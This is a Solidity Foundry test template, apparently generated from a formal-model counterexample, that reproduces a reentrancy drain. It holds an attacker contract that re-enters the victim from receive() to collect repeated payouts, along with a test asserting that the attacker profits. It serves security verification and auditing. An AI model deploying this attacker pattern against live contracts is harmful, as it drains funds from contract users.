// SPDX-License-Identifier: MIT
pragma solidity {{PRAGMA}};

// Foundry test template - ReentrancyDrain shape
//
// Generated by plumbline tlc_to_forge from the TLC counterexample of
// docs/tla/ReentrancyDrain.tla. Models the canonical CEI violation: an
// external call performed BEFORE the slot-clearing state update, allowing
// a malicious `receive()` to re-enter and trigger another payout from
// the still-Live slot.
//
// Concrete instance in plumbline corpus:
//   examples/puppy-raffle/PuppyRaffle.sol::refund
//   examples/puppy-raffle/.ANSWERS.md H-1
//
// TLC counterexample trace head (for the @notice block):
// {{TLC_TRACE_HEAD}}
//
// This test FAILS (asserts) on the buggy version of {{TARGET_CONTRACT}}.{{TARGET_FN}}
// and PASSES on the CEI-correct version where the slot is cleared first.

import {Test} from "forge-std/Test.sol";
import {{{TARGET_CONTRACT}}} from "{{TARGET_PATH}}";

/// Attacker contract — calls back into {{TARGET_CONTRACT}}.{{TARGET_FN}} from receive().
/// The buggy victim sees its slot as Live both times because the slot-clear
/// step doesn't fire until after both calls return.
contract ReentrancyAttacker {
    {{TARGET_CONTRACT}} public victim;
    uint256 public attackArg;
    uint256 public callsRemaining;
    uint256 public callsExecuted;

    constructor({{TARGET_CONTRACT}} _victim) {
        victim = _victim;
    }

    /// Begin the drain. callDepth controls re-entry count.
    function attack(uint256 _attackArg, uint256 _callDepth) external payable {
        attackArg = _attackArg;
        callsRemaining = _callDepth;
        callsExecuted = 0;
        // Initial call into victim — this is the entry whose nested receive()
        // will recursively call back in.
        victim.{{TARGET_FN}}({{TARGET_FN_CALL_ARGS}});
    }

    /// Re-entry hook. Each ETH payment triggers this; we call back into the
    /// victim's vulnerable function again while still in the call window.
    receive() external payable {
        callsExecuted++;
        if (callsRemaining > 1) {
            callsRemaining--;
            // Re-enter the SAME vulnerable function on the SAME entry/slot.
            // Per the TLC counterexample (action ReenterBuggy), the slot
            // is still observed as Live here because PreCheckBuggy's slot
            // transition to "Calling" doesn't trigger the slot-clear effect.
            victim.{{TARGET_FN}}({{TARGET_FN_CALL_ARGS}});
        }
    }
}

contract ReentrancyDrain_PoC is Test {
    {{TARGET_CONTRACT}} public victim;
    ReentrancyAttacker public attacker;

    // TODO morning: configure setUp() with the actual deployment params
    //               of {{TARGET_CONTRACT}}. The translator emits a SKELETON
    //               that you must fill with target-specific constructor
    //               args (e.g., PuppyRaffle takes entranceFee + duration).
    function setUp() public {
        // {{SETUP_DEPLOY_BLOCK}}
        // victim = new {{TARGET_CONTRACT}}(/* constructor args here */);
        // attacker = new ReentrancyAttacker(victim);
        // _registerAttackerAsEntry();
        // _fundVictim(10 ether);
    }

    /// @notice The invariant {{INVARIANT_BROKEN}} from
    ///         docs/tla/ReentrancyDrain.tla MUST hold:
    ///         each entry is paid out AT MOST TicketPrice once.
    ///         The TLC counterexample drives `paid[e] = k * TicketPrice`
    ///         for k >= 2. This test reproduces that on-chain: the attacker
    ///         drains > 1× their original deposit.
    function test_ReentrancyDrain_exploit() public {
        uint256 victimBalanceBefore = address(victim).balance;
        uint256 attackerBalanceBefore = address(attacker).balance;

        // Execute the attack. callDepth=3 reproduces the TLC trace's
        // PreCheckBuggy → ReenterBuggy → ReenterBuggy → PostClearBuggy
        // unwind. callDepth=2 is sufficient to demonstrate violation;
        // 3 just makes the drain magnitude more obvious.
        attacker.attack({{TARGET_FN_CALL_ARGS}}, 3);

        uint256 attackerBalanceAfter = address(attacker).balance;
        uint256 victimBalanceAfter = address(victim).balance;

        // Attacker received more than their original deposit's worth.
        // The exact multiple matches `callsExecuted` from the attacker.
        assertGt(attacker.callsExecuted(), 1,
            "expected at least 2 successful re-entry payouts");
        assertGt(attackerBalanceAfter, attackerBalanceBefore,
            "attacker should have profited from re-entry");
        assertLt(victimBalanceAfter, victimBalanceBefore,
            "victim contract balance should have decreased by multiple payouts");

        // Tightest claim: the multiple should equal callsExecuted.
        // (Disabled by default — TicketPrice-aware variant in template v2.)
        // assertEq(attackerBalanceAfter - attackerBalanceBefore,
        //          attacker.callsExecuted() * TICKET_PRICE);
    }

    /// @notice Negative control: the CEI-correct version of {{TARGET_FN}}
    ///         clears the slot BEFORE the external call. Re-entry sees
    ///         slot = Cleared and the guard rejects. attacker.callsExecuted()
    ///         should be exactly 1.
    function test_ReentrancyDrain_correctFlow_passes() public {
        // TODO: requires the fixed version of {{TARGET_CONTRACT}} deployed.
        // For now this is a documentation skeleton — fill when the fix
        // is available so we can demonstrate the rule of two.
        // vm.skip(true);
    }
}
